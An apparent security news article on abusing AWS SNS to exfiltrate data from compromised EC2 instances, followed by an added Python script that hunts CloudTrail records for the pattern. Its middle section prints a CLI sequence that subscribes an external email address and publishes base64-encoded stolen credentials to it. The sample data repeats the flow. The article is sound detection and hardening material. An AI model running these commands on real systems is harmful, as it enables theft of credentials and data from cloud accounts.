Amazon Web Services Simple Notification Service (AWS SNS) has emerged as a new vector for malicious actors to exfiltrate sensitive data and conduct phishing campaigns.
This pub/sub messaging service, designed to enable application-to-person and application-to-application communications, is increasingly being exploited by attackers seeking to bypass traditional security controls and network monitoring.
The attacks leverage legitimate AWS functionality to create SNS topics, subscribe external email addresses, and publish sensitive data through API calls that appear as normal AWS service usage.
The technique sidesteps security groups, network ACLs, and other network-based protections because the stolen data never travels to an attacker-controlled host: it leaves the instance as HTTPS calls to the regional SNS API endpoint, traffic that egress rules in most environments already permit.
Analysts at Elastic Security Labs identified that adversaries with access to EC2 instances can exploit attached IAM roles that have SNS permissions to establish exfiltration channels.
Their research demonstrated how attackers can use native AWS CLI commands to create topics and subscribe external email addresses that receive the stolen data.
The exfiltration technique is particularly concerning because it leaves little evidence on the host itself and blends in with legitimate API traffic.
Organizations with permissive IAM policies or monitoring gaps may not detect this activity until after sensitive data has been compromised.
The technical implementation of this attack is straightforward and requires only basic AWS CLI knowledge.
After gaining access to an EC2 instance whose role allows sns:CreateTopic, sns:Subscribe, and sns:Publish, attackers can execute a series of commands to establish the exfiltration channel:
# Create SNS topic and capture its ARN
TOPIC_ARN=$(aws sns create-topic --name "whitebox-sns-topic" --query 'TopicArn' --output text)
# Subscribe external email to the topic
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol email --notification-endpoint "[email protected]"
# Base64 encode stolen credentials and publish to topic
BASE64_CONTENT=$(base64 /tmp/stolen_creds.txt)
aws sns publish --topic-arn "$TOPIC_ARN" --message "$BASE64_CONTENT" --subject "Encoded Credentials from EC2"
Detection efforts should focus on CloudTrail logs for unusual SNS API calls, particularly CreateTopic and Subscribe actions from EC2 instance roles (visible as an AssumedRole identity whose session name is the instance ID). Publish is an SNS data event and appears in CloudTrail only if data-event logging is enabled for SNS.
Elastic Security Labs provided hunting queries that identify anomalous SNS activity by monitoring for rare user identities creating topics or subscribing with email protocols.
Security teams are advised to apply least privilege to instance roles, in particular withholding sns:CreateTopic and sns:Subscribe from workloads that only need to publish to known topics, and to enable comprehensive logging of SNS activity so this exfiltration channel can be detected.
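The following hunt logic is an added example, not Elastic Security Labs' own queries or any code from the original article. It runs over constructed CloudTrail-style records (field names follow CloudTrail's format; account IDs, role names, and endpoints are made up) and implements the two ideas from the detection guidance: flag CreateTopic and email Subscribe calls that come from an EC2 instance role or from an identity with no prior history, and flag Publish only when it targets a topic that an instance role staged earlier in the same batch, so ordinary application publishes stay quiet.

```python
"""Hunt CloudTrail records for the SNS exfiltration pattern (added example).

Records are constructed for this example; real input would be CloudTrail
JSON records (eventSource, eventName, userIdentity, requestParameters,
responseElements). Publish appears only if SNS data-event logging is on.
"""
import re

# EC2 instance-role credentials show up as an assumed role whose session
# name is the instance ID, e.g. arn:aws:sts::ACCT:assumed-role/Role/i-0123...
INSTANCE_SESSION = re.compile(r":assumed-role/[^/]+/i-[0-9a-f]{8,17}$")


def is_instance_role(record):
    ident = record.get("userIdentity", {})
    return ident.get("type") == "AssumedRole" and bool(
        INSTANCE_SESSION.search(ident.get("arn", "")))


def hunt(records, baseline_identities):
    """Return human-readable findings for SNS calls matching the pattern.

    baseline_identities: ARNs that have created topics or subscribed endpoints
    before (e.g. seen in the previous 30 days); any other identity is 'rare'.
    """
    findings = []
    staged_topics = set()  # topics an instance role created or email-subscribed
    for rec in records:
        if rec.get("eventSource") != "sns.amazonaws.com":
            continue
        name = rec.get("eventName")
        arn = rec.get("userIdentity", {}).get("arn", "")
        params = rec.get("requestParameters") or {}
        from_instance = is_instance_role(rec)
        rare = arn not in baseline_identities
        who = "instance role" if from_instance else "rare user"

        if name == "CreateTopic" and (from_instance or rare):
            topic = (rec.get("responseElements") or {}).get("topicArn", "")
            findings.append(f"CreateTopic by {who} {arn}: {params.get('name')}")
            if from_instance:
                staged_topics.add(topic)
        elif (name == "Subscribe" and params.get("protocol") == "email"
              and (from_instance or rare)):
            findings.append(f"Email subscription {params.get('endpoint')} -> "
                            f"{params.get('topicArn')} by {who} {arn}")
            if from_instance:
                staged_topics.add(params.get("topicArn"))
        elif name == "Publish" and params.get("topicArn") in staged_topics:
            findings.append(f"Publish to staged topic {params['topicArn']} by {arn} "
                            f"(subject: {params.get('subject')})")
    return findings


# Constructed sample data: one attacker sequence from an instance role, then
# benign activity from a known operator and from the same instance role.
ROLE_ARN = "arn:aws:sts::111122223333:assumed-role/WebAppRole/i-0123456789abcdef0"
ALICE_ARN = "arn:aws:iam::111122223333:user/alice"
EXFIL_TOPIC = "arn:aws:sns:us-east-1:111122223333:whitebox-sns-topic"
APP_TOPIC = "arn:aws:sns:us-east-1:111122223333:order-events"
BASELINE = {ALICE_ARN}

SAMPLE_RECORDS = [
    {"eventSource": "sns.amazonaws.com", "eventName": "CreateTopic",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN},
     "requestParameters": {"name": "whitebox-sns-topic"},
     "responseElements": {"topicArn": EXFIL_TOPIC}},
    {"eventSource": "sns.amazonaws.com", "eventName": "Subscribe",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN},
     "requestParameters": {"topicArn": EXFIL_TOPIC, "protocol": "email",
                           "endpoint": "attacker@example.com"}},
    {"eventSource": "sns.amazonaws.com", "eventName": "Publish",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN},
     "requestParameters": {"topicArn": EXFIL_TOPIC,
                           "subject": "Encoded Credentials from EC2"}},
    {"eventSource": "sns.amazonaws.com", "eventName": "CreateTopic",
     "userIdentity": {"type": "IAMUser", "arn": ALICE_ARN},
     "requestParameters": {"name": "order-events"},
     "responseElements": {"topicArn": APP_TOPIC}},
    {"eventSource": "sns.amazonaws.com", "eventName": "Subscribe",
     "userIdentity": {"type": "IAMUser", "arn": ALICE_ARN},
     "requestParameters": {"topicArn": APP_TOPIC, "protocol": "sqs",
                           "endpoint": "arn:aws:sqs:us-east-1:111122223333:orders"}},
    {"eventSource": "sns.amazonaws.com", "eventName": "Publish",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN},
     "requestParameters": {"topicArn": APP_TOPIC, "subject": "order 42"}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN},
     "requestParameters": {}},
]

if __name__ == "__main__":
    for line in hunt(SAMPLE_RECORDS, BASELINE):
        print(line)
```

Run against the sample batch, the three attacker calls are reported and the operator's topic with an SQS subscription and the instance role's publish to the existing application topic are not. In production the baseline would be built from a trailing window of CloudTrail history rather than a hard-coded set, and the correlation of Publish to staged topics would span that window instead of a single batch.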